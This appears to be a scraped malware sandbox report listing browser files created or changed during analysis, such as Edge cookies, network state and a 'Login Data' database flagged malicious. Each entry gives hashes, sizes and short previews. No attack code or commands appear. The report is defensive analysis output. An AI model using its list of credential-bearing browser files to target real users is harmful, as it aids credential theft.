                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:29.271 2358 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/03/08-18:52:29.272 2358 Recovering log #3.2025/03/08-18:52:29.276 2358 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):334
                                                                                                                                                                                                                                                                                Entropy (8bit):5.178413267459042
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWM1N+q2Pwkn23oH+Tcwt8a2jMGIFUtdWMYFH5ZmwrWMcFX9VkwOwkn23oH+Tg:7h1IvYfYeb8EFUt7YZ5/9cZ5JfYeb8bJ
                                                                                                                                                                                                                                                                                MD5:D1127208CE3DB6202A5339243DD51014
                                                                                                                                                                                                                                                                                SHA1:1B2228E0F28F5304CAC5D9F2D5134C5C03BD926C
                                                                                                                                                                                                                                                                                SHA-256:437398A0D818E1AEC2D048FB07E87087E8DACD8961307E2EDC786E0100448350
                                                                                                                                                                                                                                                                                SHA-512:9E2EE3A6CCFEFC5BD8043372BC41E13B6D0B65618A14C418A7EE26395BEC2E81A283229744316021CF71931B53104021D0F23092A52834DDC636A24DEA07D2B8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:29.271 2358 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/03/08-18:52:29.272 2358 Recovering log #3.2025/03/08-18:52:29.276 2358 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 28, cookie 0x1d, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):57344
                                                                                                                                                                                                                                                                                Entropy (8bit):0.863060653641558
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:u7/KLPeymOT7ynlm+yKwt7izhGnvgbn8MouB6wznP:u74CnlmVizhGE7IwD
                                                                                                                                                                                                                                                                                MD5:C681C90B3AAD7F7E4AF8664DE16971DF
                                                                                                                                                                                                                                                                                SHA1:9F72588CEA6569261291B19E06043A1EFC3653BC
                                                                                                                                                                                                                                                                                SHA-256:ADB987BF641B2531991B8DE5B10244C3FE1ACFA7AD7A61A65D2E2D8E7AB34C1D
                                                                                                                                                                                                                                                                                SHA-512:4696BF334961E4C9757BAC40C41B4FBE3E0B9F821BD242CE6967B347053787BE54D1270D7166745126AFA42E8193AC2E695B0D8F11DE8F0B2876628B7C128942
                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):45056
                                                                                                                                                                                                                                                                                Entropy (8bit):0.40293591932113104
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
                                                                                                                                                                                                                                                                                MD5:ADC0CFB8A1A20DE2C4AB738B413CBEA4
                                                                                                                                                                                                                                                                                SHA1:238EF489E5FDC6EBB36F09D415FB353350E7097B
                                                                                                                                                                                                                                                                                SHA-256:7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
                                                                                                                                                                                                                                                                                SHA-512:38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\20d6aa33-21e5-4621-8a60-22cbc11d6609.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\2154d66b-73f0-4c55-9892-db1deced4afc.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                Size (bytes):1647
                                                                                                                                                                                                                                                                                Entropy (8bit):5.284974308725703
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:YXsw8stfcdsyleebsrgnsqCgH9sbCgHmbZ:4pmke6+T0Tm1
                                                                                                                                                                                                                                                                                MD5:B208223D51D1058C51B83AEE4EF2D91F
                                                                                                                                                                                                                                                                                SHA1:80BA008E3C101388D667087363B10ED30B7C6BA9
                                                                                                                                                                                                                                                                                SHA-256:CA73F248973009D02429F4345C7E4F4CCA8E343E5B4CBFF48D8B9B327BFC81C1
                                                                                                                                                                                                                                                                                SHA-512:8B17B99D58391BD956D2239873D51E98B6C700689D2132670B8BD413EB997A3D0B5FF01EE5F4B5DDB978C454D9B1CDBEA89EAFDC95D8B956BEEA22E196B82E3C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13388543553940179","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13388543557880946","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13386045162625480","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13388543564407969","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://w

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\324e054c-b81d-4216-8bc8-9aa2fa19bd8a.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\69c3ec2b-943e-4eb5-b262-8f199903e50d.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\6fc0976a-0d9f-4708-875e-3abe2453871c.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                Entropy (8bit):2.826765059700269
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:tTmsg16qcPQzwNGzZWclzwU40c4p0L/ZJVb:VmsdQz2GzZs0lp0LhJVb
                                                                                                                                                                                                                                                                                MD5:F290AC1A93E3445D7652A23B6146E639
                                                                                                                                                                                                                                                                                SHA1:AB8D76FAFAD28A6F128B64EB4F76C345B01D686B
                                                                                                                                                                                                                                                                                SHA-256:A46BCE197CC4D96C09C5485339D7C24531832D3F2FC07EA4365857D0E4C4105C
                                                                                                                                                                                                                                                                                SHA-512:D96B6C71718ED59743AAEA2A1D6E27E75997AC830A1A5DCB202598C8214A0BEF6549D1707FDA8CF94059D8DDFB30919E10284F0541B753F257CF6CCE7ED18F35
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                                                Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF25dc6.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                                                Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF34835.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                                                Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF43fc4.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                                                Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                Entropy (8bit):1.212636551927487
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB9W:JkIEumQv8m1ccnvS6Rqngp+v
                                                                                                                                                                                                                                                                                MD5:F914171BCC332703FEDC73DFD36E56C9
                                                                                                                                                                                                                                                                                SHA1:215ADAF0F76FC7F69CBA0EF919A49646A04A94F4
                                                                                                                                                                                                                                                                                SHA-256:4006DD6AD002199CEFFB54F64003544995D882C7D05012AD86FC19353B25525F
                                                                                                                                                                                                                                                                                SHA-512:3260F135C4385925FF7AB5EB8829213C19AD327A6187C5DE1B3DE687B3854C79A20C84007B340D01188958A16CBBFFFBB6DFD5004E4970F4090C777AB38581B0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF23aad.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF25058.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):203
                                                                                                                                                                                                                                                                                Entropy (8bit):5.4042796420747425
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                                                                                                                                MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                                                                                                                                SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                                                                                                                                SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                                                                                                                                SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity~RF25dc6.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):203
                                                                                                                                                                                                                                                                                Entropy (8bit):5.4042796420747425
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                                                                                                                                MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                                                                                                                                SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                                                                                                                                SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                                                                                                                                SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                                                                                                                                Malicious:false
